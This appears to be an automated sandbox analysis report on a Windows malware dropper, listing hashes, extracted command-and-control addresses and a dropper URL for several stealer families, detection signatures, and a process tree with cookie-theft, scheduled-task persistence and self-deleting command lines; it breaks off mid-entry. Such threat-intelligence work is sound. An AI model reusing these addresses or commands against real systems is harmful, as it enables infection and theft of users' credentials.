Analysis

  • max time kernel
    129s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    13-08-2021 19:33

General

  • Target

    6ADB8AA23FE92E5441F1156CC3FB949E.exe

  • Size

    631KB

  • MD5

    6adb8aa23fe92e5441f1156cc3fb949e

  • SHA1

    11abcec421eee539de1dea494c3159d3bf163881

  • SHA256

    31452b50fe8475fa4566b814ed702c6910029ff66db45d3dbb21c2e3ed63594f

  • SHA512

    316d7a3be61d4a227fdbb4351647467b65ea97df58403273c90ac6319229b2449fed1aec83eaa01eb1e75ac31d7682c3fa954cd1f1fa56c3b02a38de32b5f951

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

raccoon

Botnet

93d3ccba4a3cbd5e268873fc1760b2335272e198

Attributes
  • url4cnc

    https://telete.in/opa4kiprivatem

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

40

Botnet

916

C2

https://lenak513.tumblr.com/

Attributes
  • profile_id

    916

Extracted

Family

redline

Botnet

installs2

C2

65.21.228.92:46802

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

40

Botnet

937

C2

https://lenak513.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

12_08_fatboy

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

ls2

C2

salkefard.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 63 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe
    "C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Users\Admin\Documents\hpG_QsrS8jyUhxZBwiU7DK_t.exe
      "C:\Users\Admin\Documents\hpG_QsrS8jyUhxZBwiU7DK_t.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      PID:4192
      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        3⤵
        • Executes dropped EXE
        PID:3588
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:3988
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:3976
      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        3⤵
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
        3⤵
        • Executes dropped EXE
        • Drops startup file
        PID:2120
        • C:\Users\Admin\AppData\Local\Temp\11111.exe
          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:4416
        • C:\Users\Admin\AppData\Local\Temp\11111.exe
          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
          4⤵
          • Executes dropped EXE
          PID:5108
        • C:\Users\Admin\AppData\Local\Temp\11111.exe
          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:740
        • C:\Users\Admin\AppData\Local\Temp\11111.exe
          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
          4⤵
          • Executes dropped EXE
          PID:5880
        • C:\Users\Admin\AppData\Local\Temp\22222.exe
          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          4⤵
          • Executes dropped EXE
          PID:5876
        • C:\Users\Admin\AppData\Local\Temp\22222.exe
          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
          4⤵
            PID:2284
          • C:\Users\Admin\AppData\Local\Temp\22222.exe
            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            4⤵
            • Executes dropped EXE
            PID:5156
          • C:\Users\Admin\AppData\Local\Temp\22222.exe
            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
            4⤵
            • Executes dropped EXE
            PID:4628
      • C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe
        "C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"
        2⤵
        • Executes dropped EXE
        PID:4180
        • C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe
          "C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4476
        • C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe
          "C:\Users\Admin\Documents\Pb17tPXfuEqViJcCjKmT7yDb.exe"
          3⤵
            PID:1612
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              4⤵
                PID:4932
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  5⤵
                    PID:5932
            • C:\Users\Admin\Documents\b0Jm51vLbWPyCkE6vTfUOh8q.exe
              "C:\Users\Admin\Documents\b0Jm51vLbWPyCkE6vTfUOh8q.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:4164
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 760
                3⤵
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1052
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 812
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:2196
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 848
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:4768
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 956
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:5480
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1000
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:5672
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1052
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:2204
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1428
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:1260
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1468
                3⤵
                • Program crash
                PID:5748
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4164 -s 1512
                3⤵
                • Program crash
                PID:2780
            • C:\Users\Admin\Documents\UxSWhTy41TFRKucJet4YNiEK.exe
              "C:\Users\Admin\Documents\UxSWhTy41TFRKucJet4YNiEK.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4156
              • C:\Users\Admin\AppData\Roaming\8732185.exe
                "C:\Users\Admin\AppData\Roaming\8732185.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4636
              • C:\Users\Admin\AppData\Roaming\3549794.exe
                "C:\Users\Admin\AppData\Roaming\3549794.exe"
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4844
                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4688
              • C:\Users\Admin\AppData\Roaming\3270862.exe
                "C:\Users\Admin\AppData\Roaming\3270862.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4356
              • C:\Users\Admin\AppData\Roaming\2101679.exe
                "C:\Users\Admin\AppData\Roaming\2101679.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5172
            • C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe
              "C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4144
              • C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe
                "C:\Users\Admin\Documents\xlzHeuwelgGNWi4FQtKYtaLs.exe"
                3⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:5112
            • C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V.exe
              "C:\Users\Admin\Documents\cBtqBNqwXdb3zhTMvm1NJw2V.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4420
              • C:\Users\Admin\AppData\Roaming\4274478.exe
                "C:\Users\Admin\AppData\Roaming\4274478.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5304
              • C:\Users\Admin\AppData\Roaming\4806551.exe
                "C:\Users\Admin\AppData\Roaming\4806551.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5380
            • C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe
              "C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe"
              2⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:4380
            • C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe
              "C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe"
              2⤵
              • Executes dropped EXE
              PID:4372
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1152
                3⤵
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:4532
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "x5iNqYgETCMGFiSGZnpQGxcq.exe" /f & erase "C:\Users\Admin\Documents\x5iNqYgETCMGFiSGZnpQGxcq.exe" & exit
                3⤵
                  PID:6036
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "x5iNqYgETCMGFiSGZnpQGxcq.exe" /f
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4196
              • C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe
                "C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"
                2⤵
                • Executes dropped EXE
                PID:4364
                • C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe
                  "C:\Users\Admin\Documents\PXBzV_zEw_pgOR1zKtBuDE1n.exe"
                  3⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4248
              • C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe
                "C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe"
                2⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:4344
              • C:\Users\Admin\Documents\XnOoxUckggjX5foWJMU2gw8A.exe
                "C:\Users\Admin\Documents\XnOoxUckggjX5foWJMU2gw8A.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4336
              • C:\Users\Admin\Documents\Y6eV1ERSHcBk8XWyMyACCKSW.exe
                "C:\Users\Admin\Documents\Y6eV1ERSHcBk8XWyMyACCKSW.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4324
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 768
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2332
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 792
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4708
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 868
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5520
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 812
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4568
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 956
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5744
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 984
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4760
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1060
                  3⤵
                  • Program crash
                  PID:5560
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1388
                  3⤵
                  • Program crash
                  PID:5920
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1528
                  3⤵
                  • Program crash
                  PID:6128
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1336
                  3⤵
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5560
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1732
                  3⤵
                  • Program crash
                  PID:5812
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1728
                  3⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  PID:5404
              • C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe
                "C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4316
                • C:\Users\Admin\Documents\SoICTNRTJ2YvPMH8qYwUTKKW.exe
                  "{path}"
                  3⤵
                  • Executes dropped EXE
                  PID:5888
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    4⤵
                    • Creates scheduled task(s)
                    PID:6080
              • C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe
                "C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4308
                • C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe
                  C:\Users\Admin\Documents\ehAkZbkYLsgDGk486mcpJWLA.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4948
              • C:\Users\Admin\Documents\5z38j0u0A1gH6MVqMIsMFzEz.exe
                "C:\Users\Admin\Documents\5z38j0u0A1gH6MVqMIsMFzEz.exe"
                2⤵
                  PID:4300
                • C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe
                  "C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4292
                  • C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe
                    C:\Users\Admin\Documents\neVBHdSUrlSjAeQjSg3KZDBw.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4240
                • C:\Users\Admin\Documents\eGJclJQJWVBOFygCVzpPNsAl.exe
                  "C:\Users\Admin\Documents\eGJclJQJWVBOFygCVzpPNsAl.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4284
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 664
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:772
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 680
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4120
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 636
                    3⤵
                    • Program crash
                    PID:4532
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 852
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5536
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1248
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6016
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1240
                    3⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4468
                • C:\Users\Admin\Documents\AfGceh7C3AiICU0VpXEapNYr.exe
                  "C:\Users\Admin\Documents\AfGceh7C3AiICU0VpXEapNYr.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4268
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    3⤵
                    • Executes dropped EXE
                    PID:4848
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    3⤵
                    • Executes dropped EXE
                    PID:4720
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    3⤵
                    • Executes dropped EXE
                    PID:5464
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 4268 -s 1552
                    3⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    PID:5532
                • C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe
                  "C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4260
                  • C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe
                    C:\Users\Admin\Documents\RbEqteJ5drtD1PHvqibD7reP.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4232
                • C:\Users\Admin\Documents\hozif_R0m00yWfOVjtp_PDHQ.exe
                  "C:\Users\Admin\Documents\hozif_R0m00yWfOVjtp_PDHQ.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4252
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 736
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:808
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 752
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4484
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 888
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5552
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 716
                    3⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1496
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 832
                    3⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2172
                • C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe
                  "C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4580
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                    3⤵
                      PID:4248
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                      3⤵
                        PID:5272
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                        3⤵
                          PID:4320
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                          3⤵
                            PID:6000
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                            3⤵
                              PID:4904
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                              3⤵
                                PID:4860
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEE7.tmp\tempfile.ps1"
                                3⤵
                                • Checks for any installed AV software in registry
                                • Suspicious use of SetThreadContext
                                PID:4292
                              • C:\Windows\SysWOW64\bitsadmin.exe
